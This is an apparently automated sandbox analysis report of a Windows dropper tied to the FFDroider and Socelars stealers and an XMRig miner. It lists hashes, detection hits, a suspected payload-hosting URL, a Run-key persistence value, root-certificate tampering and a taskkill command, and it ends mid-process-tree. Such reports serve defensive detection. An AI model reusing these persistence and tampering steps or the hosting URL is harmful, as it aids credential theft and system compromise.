ffdroider | 042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261

Analysis

max time kernel
119s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
27-05-2022 22:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe
Size

9.3MB
MD5

f043a639a61ed744dc26275933ab7b6f
SHA1

c1c46433f30317e9670ebb3f4da9294bec5739ac
SHA256

042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261
SHA512

1f9cb06cd57aee400ae24fcda7b386800e9ac553a02e7ea15f44750d489a55bddd380ad79d1aa631340551623901e42e46e9780ded7278ed7612ef3fc8ff5bf7

Score

10^/10

ffdroider socelars xmrig aspackv2 discovery evasion miner persistence spyware stealer suricata trojan

Malware Config

Extracted

Family

socelars

https://sa-us-bucket.s3.us-east-2.amazonaws.com/qwwgh/

Signatures

FFDroider
Stealer targeting social media platform users first seen in April 2022.
stealer ffdroider

FFDroider Payload 12 IoCs

resource	yara_rule
behavioral2/memory/3368-145-0x0000000000AB0000-0x0000000000EDB000-memory.dmp	family_ffdroider
behavioral2/memory/3368-147-0x0000000000AB0000-0x0000000000EDB000-memory.dmp	family_ffdroider
behavioral2/memory/3368-151-0x0000000000AB0000-0x0000000000EDB000-memory.dmp	family_ffdroider
behavioral2/memory/3368-152-0x0000000000AB0000-0x0000000000EDB000-memory.dmp	family_ffdroider
behavioral2/memory/3388-188-0x0000000000400000-0x00000000009E6000-memory.dmp	family_ffdroider
behavioral2/memory/3388-198-0x0000000000400000-0x00000000009E6000-memory.dmp	family_ffdroider
behavioral2/memory/3388-194-0x0000000000400000-0x00000000009E6000-memory.dmp	family_ffdroider
behavioral2/memory/3388-206-0x0000000000400000-0x00000000009E6000-memory.dmp	family_ffdroider
behavioral2/memory/3388-212-0x0000000000400000-0x00000000009E6000-memory.dmp	family_ffdroider
behavioral2/memory/3388-226-0x0000000000400000-0x00000000009E6000-memory.dmp	family_ffdroider
behavioral2/memory/3368-848-0x0000000000AB0000-0x0000000000EDB000-memory.dmp	family_ffdroider
behavioral2/memory/3388-849-0x0000000000400000-0x00000000009E6000-memory.dmp	family_ffdroider

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	976	3416	rundll32.exe	14

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0006000000022ebd-162.dat	family_socelars
behavioral2/files/0x0006000000022ebd-161.dat	family_socelars

suricata: ET MALWARE MSIL/TrojanDownloader.Agent.JVN CnC Checkin
suricata: ET MALWARE MSIL/TrojanDownloader.Agent.JVN CnC Checkin
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

resource	yara_rule
behavioral2/memory/4928-738-0x000000014030F3F8-mapping.dmp	xmrig
behavioral2/memory/4928-754-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/4928-813-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

ASPack v2.12-2.42 2 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0006000000022eb8-137.dat	aspack_v212_v242
behavioral2/files/0x0006000000022eb8-138.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 32 IoCs

pid	Process
4380	123.exe
3368	dengbing.exe
3748	SharkSoftSetup36667.exe
4244	yangling.exe
2708	inst100.exe
2660	tvstream1.exe
4588	yangling.exe
3388	md7_7dfj.exe
2188	udontsay.exe
4548	Routes Installation.exe
1972	ebook.exe
4836	anytime1.exe
3868	anytime2.exe
4668	anytime3.exe
4632	anytime4.exe
4728	bearvpn3.exe
1136	LzmwAqmV.exe
4860	Software770.exe
216	services64.exe
2312	Routes.exe
2984	Routes.exe
2132	Routes.exe
4828	Routes.exe
2180	Routes.exe
5088	Routes.exe
4480	Routes.exe
4820	Routes.exe
3792	Routes.exe
3656	Routes.exe
4184	Routes.exe
2304	sihost64.exe
2496	Routes.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Routes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Routes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Routes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	yangling.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	anytime1.exe

Loads dropped DLL 50 IoCs

pid	Process
2188	udontsay.exe
4548	Routes Installation.exe
4548	Routes Installation.exe
4548	Routes Installation.exe
4548	Routes Installation.exe
4548	Routes Installation.exe
672	rundll32.exe
4860	Software770.exe
4860	Software770.exe
4860	Software770.exe
4860	Software770.exe
2312	Routes.exe
4860	Software770.exe
2312	Routes.exe
2312	Routes.exe
4860	Software770.exe
4548	Routes Installation.exe
2984	Routes.exe
2132	Routes.exe
4828	Routes.exe
4828	Routes.exe
4828	Routes.exe
2180	Routes.exe
2180	Routes.exe
2180	Routes.exe
5088	Routes.exe
5088	Routes.exe
5088	Routes.exe
4480	Routes.exe
4820	Routes.exe
4480	Routes.exe
4480	Routes.exe
4828	Routes.exe
4820	Routes.exe
4820	Routes.exe
4820	Routes.exe
4480	Routes.exe
3792	Routes.exe
3792	Routes.exe
3792	Routes.exe
3792	Routes.exe
3656	Routes.exe
3656	Routes.exe
3656	Routes.exe
4184	Routes.exe
4184	Routes.exe
4184	Routes.exe
2496	Routes.exe
2496	Routes.exe
2496	Routes.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows\CurrentVersion\Run	Software770.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Routes = "C:\\Users\\Admin\\AppData\\Roaming\\Routes\\Routes.exe --uOyLnaD1"	Software770.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	dengbing.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3388	md7_7dfj.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4732 set thread context of 4928	4732	conhost.exe	143

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
4164	672	WerFault.exe	98
3056	4668	WerFault.exe	94
2640	3868	WerFault.exe	93
2404	4632	WerFault.exe	95

NSIS installer 8 IoCs

installer

resource	yara_rule
behavioral2/files/0x0006000000022ec1-172.dat	nsis_installer_1
behavioral2/files/0x0006000000022ec1-172.dat	nsis_installer_2
behavioral2/files/0x0006000000022ec1-179.dat	nsis_installer_1
behavioral2/files/0x0006000000022ec1-179.dat	nsis_installer_2
behavioral2/files/0x0006000000022ece-247.dat	nsis_installer_1
behavioral2/files/0x0006000000022ece-247.dat	nsis_installer_2
behavioral2/files/0x0006000000022ece-248.dat	nsis_installer_1
behavioral2/files/0x0006000000022ece-248.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4644	schtasks.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1352	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1809750270-3141839489-3074374771-1000\{21DEC5BF-58ED-4293-A57A-DB6BFB8F79B2}	Routes.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1809750270-3141839489-3074374771-1000\{74707F6D-3FF6-4958-8E7B-A637D9925C1D}	Routes.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	tvstream1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	tvstream1.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
764	conhost.exe
2988	powershell.exe
2988	powershell.exe
4868	powershell.exe
4868	powershell.exe
2312	Routes.exe
2312	Routes.exe
4828	Routes.exe
4828	Routes.exe
2180	Routes.exe
2180	Routes.exe
5088	Routes.exe
5088	Routes.exe
4480	Routes.exe
4480	Routes.exe
4820	Routes.exe
4820	Routes.exe
3792	Routes.exe
3792	Routes.exe
3656	Routes.exe
3656	Routes.exe
4184	Routes.exe
4184	Routes.exe
4732	conhost.exe
4732	conhost.exe
4732	conhost.exe
2112	powershell.exe
2112	powershell.exe
2112	powershell.exe
4928	explorer.exe
4928	explorer.exe
4364	powershell.exe
4364	powershell.exe
4928	explorer.exe
4928	explorer.exe
4364	powershell.exe
4928	explorer.exe
4928	explorer.exe
2496	Routes.exe
2496	Routes.exe
4928	explorer.exe
4928	explorer.exe
4928	explorer.exe
4928	explorer.exe
4928	explorer.exe
4928	explorer.exe
4928	explorer.exe
4928	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3748	SharkSoftSetup36667.exe
Token: SeCreateTokenPrivilege	2660	tvstream1.exe
Token: SeAssignPrimaryTokenPrivilege	2660	tvstream1.exe
Token: SeLockMemoryPrivilege	2660	tvstream1.exe
Token: SeIncreaseQuotaPrivilege	2660	tvstream1.exe
Token: SeMachineAccountPrivilege	2660	tvstream1.exe
Token: SeTcbPrivilege	2660	tvstream1.exe
Token: SeSecurityPrivilege	2660	tvstream1.exe
Token: SeTakeOwnershipPrivilege	2660	tvstream1.exe
Token: SeLoadDriverPrivilege	2660	tvstream1.exe
Token: SeSystemProfilePrivilege	2660	tvstream1.exe
Token: SeSystemtimePrivilege	2660	tvstream1.exe
Token: SeProfSingleProcessPrivilege	2660	tvstream1.exe
Token: SeIncBasePriorityPrivilege	2660	tvstream1.exe
Token: SeCreatePagefilePrivilege	2660	tvstream1.exe
Token: SeCreatePermanentPrivilege	2660	tvstream1.exe
Token: SeBackupPrivilege	2660	tvstream1.exe
Token: SeRestorePrivilege	2660	tvstream1.exe
Token: SeShutdownPrivilege	2660	tvstream1.exe
Token: SeDebugPrivilege	2660	tvstream1.exe
Token: SeAuditPrivilege	2660	tvstream1.exe
Token: SeSystemEnvironmentPrivilege	2660	tvstream1.exe
Token: SeChangeNotifyPrivilege	2660	tvstream1.exe
Token: SeRemoteShutdownPrivilege	2660	tvstream1.exe
Token: SeUndockPrivilege	2660	tvstream1.exe
Token: SeSyncAgentPrivilege	2660	tvstream1.exe
Token: SeEnableDelegationPrivilege	2660	tvstream1.exe
Token: SeManageVolumePrivilege	2660	tvstream1.exe
Token: SeImpersonatePrivilege	2660	tvstream1.exe
Token: SeCreateGlobalPrivilege	2660	tvstream1.exe
Token: 31	2660	tvstream1.exe
Token: 32	2660	tvstream1.exe
Token: 33	2660	tvstream1.exe
Token: 34	2660	tvstream1.exe
Token: 35	2660	tvstream1.exe
Token: SeDebugPrivilege	4380	123.exe
Token: SeDebugPrivilege	1972	ebook.exe
Token: SeDebugPrivilege	4836	anytime1.exe
Token: SeDebugPrivilege	3868	anytime2.exe
Token: SeDebugPrivilege	4668	anytime3.exe
Token: SeDebugPrivilege	4632	anytime4.exe
Token: SeDebugPrivilege	4728	bearvpn3.exe
Token: SeDebugPrivilege	1352	taskkill.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeDebugPrivilege	764	conhost.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeManageVolumePrivilege	3388	md7_7dfj.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeManageVolumePrivilege	3388	md7_7dfj.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeManageVolumePrivilege	3388	md7_7dfj.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeManageVolumePrivilege	3388	md7_7dfj.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeManageVolumePrivilege	3388	md7_7dfj.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeManageVolumePrivilege	3388	md7_7dfj.exe
Token: SeManageVolumePrivilege	3368	dengbing.exe
Token: SeManageVolumePrivilege	3388	md7_7dfj.exe
Token: SeDebugPrivilege	4732	conhost.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeLockMemoryPrivilege	4928	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2312	Routes.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4244	yangling.exe
4244	yangling.exe
4588	yangling.exe
4588	yangling.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 4380	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	79
PID 4128 wrote to memory of 4380	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	79
PID 4128 wrote to memory of 4380	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	79
PID 4128 wrote to memory of 3368	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	80
PID 4128 wrote to memory of 3368	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	80
PID 4128 wrote to memory of 3368	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	80
PID 4128 wrote to memory of 3748	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	81
PID 4128 wrote to memory of 3748	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	81
PID 4128 wrote to memory of 4244	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	82
PID 4128 wrote to memory of 4244	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	82
PID 4128 wrote to memory of 4244	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	82
PID 4128 wrote to memory of 2708	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	83
PID 4128 wrote to memory of 2708	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	83
PID 4128 wrote to memory of 2708	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	83
PID 4128 wrote to memory of 2660	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	84
PID 4128 wrote to memory of 2660	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	84
PID 4128 wrote to memory of 2660	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	84
PID 4244 wrote to memory of 4588	4244	yangling.exe	86
PID 4244 wrote to memory of 4588	4244	yangling.exe	86
PID 4244 wrote to memory of 4588	4244	yangling.exe	86
PID 4128 wrote to memory of 3388	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	87
PID 4128 wrote to memory of 3388	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	87
PID 4128 wrote to memory of 3388	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	87
PID 4128 wrote to memory of 2188	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	89
PID 4128 wrote to memory of 2188	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	89
PID 4128 wrote to memory of 2188	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	89
PID 4128 wrote to memory of 4548	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	90
PID 4128 wrote to memory of 4548	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	90
PID 4128 wrote to memory of 4548	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	90
PID 4128 wrote to memory of 1972	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	91
PID 4128 wrote to memory of 1972	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	91
PID 4128 wrote to memory of 4836	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	92
PID 4128 wrote to memory of 4836	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	92
PID 4128 wrote to memory of 3868	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	93
PID 4128 wrote to memory of 3868	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	93
PID 4128 wrote to memory of 4668	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	94
PID 4128 wrote to memory of 4668	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	94
PID 4128 wrote to memory of 4632	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	95
PID 4128 wrote to memory of 4632	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	95
PID 4128 wrote to memory of 4728	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	96
PID 4128 wrote to memory of 4728	4128	042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe	96
PID 4836 wrote to memory of 1136	4836	anytime1.exe	97
PID 4836 wrote to memory of 1136	4836	anytime1.exe	97
PID 976 wrote to memory of 672	976	rundll32.exe	98
PID 976 wrote to memory of 672	976	rundll32.exe	98
PID 976 wrote to memory of 672	976	rundll32.exe	98
PID 2660 wrote to memory of 2940	2660	tvstream1.exe	108
PID 2660 wrote to memory of 2940	2660	tvstream1.exe	108
PID 2660 wrote to memory of 2940	2660	tvstream1.exe	108
PID 2940 wrote to memory of 1352	2940	cmd.exe	112
PID 2940 wrote to memory of 1352	2940	cmd.exe	112
PID 2940 wrote to memory of 1352	2940	cmd.exe	112
PID 4548 wrote to memory of 4860	4548	Routes Installation.exe	114
PID 4548 wrote to memory of 4860	4548	Routes Installation.exe	114
PID 4548 wrote to memory of 4860	4548	Routes Installation.exe	114
PID 1136 wrote to memory of 764	1136	LzmwAqmV.exe	115
PID 1136 wrote to memory of 764	1136	LzmwAqmV.exe	115
PID 1136 wrote to memory of 764	1136	LzmwAqmV.exe	115
PID 764 wrote to memory of 5076	764	conhost.exe	116
PID 764 wrote to memory of 5076	764	conhost.exe	116
PID 5076 wrote to memory of 2988	5076	cmd.exe	118
PID 5076 wrote to memory of 2988	5076	cmd.exe	118
PID 764 wrote to memory of 4940	764	conhost.exe	119
PID 764 wrote to memory of 4940	764	conhost.exe	119

C:\Users\Admin\AppData\Local\Temp\042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe
"C:\Users\Admin\AppData\Local\Temp\042279ece97ecf5240baa9943e39f1a0ea1d26df001e64fcd45b989b4740a261.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Users\Admin\AppData\Local\Temp\123.exe
  "C:\Users\Admin\AppData\Local\Temp\123.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4380
- C:\Users\Admin\AppData\Local\Temp\dengbing.exe
  "C:\Users\Admin\AppData\Local\Temp\dengbing.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of AdjustPrivilegeToken
  PID:3368
- C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe
  "C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- C:\Users\Admin\AppData\Local\Temp\yangling.exe
  "C:\Users\Admin\AppData\Local\Temp\yangling.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4244
- - C:\Users\Admin\AppData\Local\Temp\yangling.exe
    "C:\Users\Admin\AppData\Local\Temp\yangling.exe" -h
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4588
- C:\Users\Admin\AppData\Local\Temp\inst100.exe
  "C:\Users\Admin\AppData\Local\Temp\inst100.exe"
  2⤵
  - Executes dropped EXE
  PID:2708
- C:\Users\Admin\AppData\Local\Temp\tvstream1.exe
  "C:\Users\Admin\AppData\Local\Temp\tvstream1.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2660
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1352
- C:\Users\Admin\AppData\Local\Temp\md7_7dfj.exe
  "C:\Users\Admin\AppData\Local\Temp\md7_7dfj.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:3388
- C:\Users\Admin\AppData\Local\Temp\udontsay.exe
  "C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2188
- C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
  "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Users\Admin\AppData\Local\Temp\f1Jvcp4PusUx9\Software770.exe
    C:\Users\Admin\AppData\Local\Temp\f1Jvcp4PusUx9\Software770.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    PID:4860
  - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--uOyLnaD1"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:2312
    - - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
        C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ffe7d67dec0,0x7ffe7d67ded0,0x7ffe7d67dee0
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2984
      - C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
        
